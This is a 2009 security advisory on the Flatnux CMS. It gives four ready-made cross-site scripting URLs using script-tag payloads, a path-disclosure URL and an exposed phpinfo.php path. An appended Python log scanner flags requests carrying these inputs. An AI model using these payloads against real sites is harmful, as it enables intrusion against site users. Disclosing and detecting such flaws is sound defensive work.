InterN0T - Advisories Advisories that are found by members of InterN0T.

3rd June 2009, 23:37
MaXe
Flatnux 2009-03-27 - XSS Vulnerabilities + More

Flatnux - Cross Site Scripting Vulnerabilities + More

Version Affected: "2009-03-27" (newest)

Info: See website for more information.

Credits: InterN0T

External Links:
http://www.flatnux.altervista.org/


-:: The Advisory ::-
Quote:
Vulnerable Function / ID Calls:
mod, user, from, pk & dir (some have to be used in conjunction with other function calls)

Cross Site Scripting:
1. http://www.website.tld/flatnux/index.php?mod="><script>alert(0)</script> (anyone)
2. http://www.website.tld/flatnux/index.php?mod=login&op=profile&user="><script>alert(0)</script> (registered users only)
3. http://www.website.tld/flatnux/index.php?opindex=modcont&file=misc/motd.en.php&from="><script>alert(0)</script> (admin only)
4. http://www.website.tld/flatnux/controlcenter.php?mod=controlcenter&op=03_users/20_groups&opmod=insnew_groups&pk="><script>alert(0)</script> (admin only)

Path Disclosure:
http://www.website.tld/flatnux/index.php?mod=05_Foto&dir='

Information Disclosure:
http://www.website.tld/flatnux/sections/none_Control_Center/phpinfo.php
-:: Solution ::-
I didn't bother to find one, sorry.

Disclosure Information:
- Vulnerabilities found and confirmed between 1st and 3rd June 2009.
- Published at InterN0T the 3rd June 2009.
- Bugtraq contacted the 3rd June 2009.


All of the best,
MaXe
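
For anyone running an affected install, one way to flag access-log requests that touch the parameters and the phpinfo script listed in the advisory above. This is an added example, not part of the original post or of Flatnux; the Apache-style log format, the constructed sample lines and the names classify, WATCHED_PARAMS and SAMPLE_LOG are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory names as reflected or error-triggering.
WATCHED_PARAMS = {"mod", "user", "from", "pk", "dir"}
# Characters that break out of HTML/attribute context or trigger the path error.
SUSPICIOUS = re.compile(r"[<>\"']")
# Script the advisory lists under "Information Disclosure".
PHPINFO_PATH = "/sections/none_Control_Center/phpinfo.php"
# Request line of a common/combined log format entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Jun/2009:23:30:01 +0200] "GET /flatnux/index.php'
    '?mod=%22%3E%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1" 200 5120',
    '192.0.2.10 - - [03/Jun/2009:23:30:05 +0200] "GET /flatnux/index.php'
    '?mod=05_Foto&dir=%27 HTTP/1.1" 200 812',
    '192.0.2.11 - - [03/Jun/2009:23:31:00 +0200] "GET /flatnux/sections/'
    'none_Control_Center/phpinfo.php HTTP/1.1" 200 40211',
    '192.0.2.12 - - [03/Jun/2009:23:32:00 +0200] "GET /flatnux/index.php'
    '?mod=login&op=profile&user=alice HTTP/1.1" 200 3300',
]

def classify(log_line):
    """Return a list of (finding, detail) tuples for one access-log line."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    findings = []
    if url.path.endswith(PHPINFO_PATH):
        findings.append(("phpinfo-exposure", url.path))
    # parse_qsl percent-decodes values, so URL-encoded markup is caught too.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in WATCHED_PARAMS and SUSPICIOUS.search(value):
            findings.append(("markup-in-param", name))
    return findings

def scan(lines):
    """Map each flagged line number (1-based) to its findings."""
    hits = {}
    for number, line in enumerate(lines, start=1):
        found = classify(line)
        if found:
            hits[number] = found
    return hits

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG).items():
        print(number, found)
```

A hit on phpinfo.php is worth acting on even without any other finding, since the script can simply be removed or blocked at the web server.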